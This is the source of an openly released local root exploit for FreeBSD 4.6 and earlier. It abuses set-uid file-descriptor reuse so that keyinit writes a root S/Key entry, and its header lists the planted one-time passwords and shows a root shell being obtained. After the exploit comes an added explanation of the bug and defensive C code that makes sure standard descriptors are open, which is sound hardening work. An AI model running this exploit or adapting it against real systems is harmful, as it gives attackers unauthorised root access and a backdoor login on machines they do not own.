/*
 * Proof Of Concept exploit for the FreeBSD file descriptors bug.
 * FreeBSD thought they fixed this months ago, well guess again :P
 * Thanks to the FreeBSD kernel you may now enjoy local root on all
 * FreeBSD <= 4.6 ;)
 *
 *                        *I AM FREE*
 *
 * From: DVDMAN (DVDMAN@L33TSECURITY.COM)
 * Visit Us: irc.efnet.org #l33tsecurity or www.l33tsecurity.com
 * And FreeBSD thought they fixed this :P
 *
 * GREETS:
 * thanks phased for skeys from iosmash.c :)
 * thanks all of #l33tsecurity for support :)
 * thanks Georgi Guninski for ideas
 *
 * Details: Several months ago Joost Pol made public almost the same
 * problem. FreeBSD fixed it, but the patch does not cover all the cases.
 * In some cases the kernel closes fds 0..2 after they are assigned to
 * /dev/null, leaving the system open to an attack. If a +s file is
 * execed and fds 0..2 are opened to /proc/curproc/{special}, then the
 * kernel forcefully closes them and open() then reuses them.
 *
 * This program makes the following skeys valid:
 * 95: CARE LIVE CARD LOFT CHIC HILL
 * 96: TESS OIL WELD DUD MUTE KIT
 * 97: DADE BED DRY JAW GRAB NOV
 * 98: MASS OAT ROLL TOOL AGO CAM
 * 99: DARK LEW JOLT JIVE MOS WHO
 *
 * PROOF:
 * [dvdman@xxxx:~]$ uname -a
 * FreeBSD xxx.xx 4.6-STABLE FreeBSD 4.6-STABLE #1: Sat Jul 27 20:16:20 GMT 2002 dvdman@xxxx:/usr/obj/usr/src/sys/xxx i386
 * [dvdman@xxxx:~]$ gcc iosmash2.c
 * [dvdman@xxxx:~]$ ./a.out
 * Adding dvdman:
 * ctrl-c
 * [dvdman@xxxx:~]$ su
 * s/key 98 snosoft2
 * Password:
 * [root@xxxx:/home/dvdman]#
 */

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>   /* strerror() */

int main(int argc, char *argv[])
{
    int f;
    int ret;

    /* Fill the descriptor table with copies of stdout, then free
     * slots 2 and 3 so the next open() lands on fd 2. */
    while (dup(1) != -1) {};
    close(2);
    close(3);

    f = open("/proc/curproc/mem", O_WRONLY);
    if (f == -1)
        fprintf(stdout, "Error in open /proc\n");

    fprintf(stdout, "press ctrl-c when adding...");
    fflush(stdout);   /* no newline, so flush before the exec replaces us */

    /* argv[0] carries the s/key record; keyinit echoes it into whatever
     * the kernel re-assigns to fd 2 after closing the /proc descriptor. */
    ret = execl("/usr/bin/keyinit",
                "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n",
                (char *)NULL);
    if (ret == -1) {
        fprintf(stdout, "execl() failed: %s (%d)\n", strerror(errno), errno);
    }
    return 0;
}
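The bug described in the header is that a set-uid program can start with fds 0..2 closed (or reassigned) and then have its own open() land on a standard descriptor. The usual defence, independent of the kernel fix, is for the privileged program to verify fds 0..2 itself before doing anything else. The following is an added example of that check, not code from the original post; it generalises to an arbitrary descriptor range, and the function names `fd_is_open`, `ensure_fds_open` and `ensure_std_fds_open` are the author's choices here.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* fcntl(F_GETFD) fails with EBADF only for an empty slot, so that is
 * the one case we report as "closed". */
static int fd_is_open(int fd)
{
    return !(fcntl(fd, F_GETFD) == -1 && errno == EBADF);
}

/* Point every closed descriptor in [lo, hi] at /dev/null (read-only
 * for fd 0, write-only otherwise). Returns how many were repaired,
 * or -1 if /dev/null could not be opened or moved into place. */
int ensure_fds_open(int lo, int hi)
{
    int repaired = 0;
    for (int fd = lo; fd <= hi; fd++) {
        if (fd_is_open(fd))
            continue;
        int nfd = open("/dev/null", fd == 0 ? O_RDONLY : O_WRONLY);
        if (nfd == -1)
            return -1;
        if (nfd != fd) {
            /* open() handed us a lower free slot; move it to fd. */
            if (dup2(nfd, fd) == -1) {
                close(nfd);
                return -1;
            }
            close(nfd);
        }
        repaired++;
    }
    return repaired;
}

/* What a set-uid program should run first in main(), before any
 * open() or any write to stdin/stdout/stderr. */
int ensure_std_fds_open(void)
{
    return ensure_fds_open(0, 2);
}

int main(void)
{
    int n = ensure_std_fds_open();
    printf("repaired %d standard descriptor(s)\n", n); /* -1: /dev/null unavailable */
    return n < 0;
}
```

With fds 0..2 already open the call is a no-op returning 0; a program started with stderr closed gets a /dev/null on fd 2 instead of having its next open() silently become its error stream.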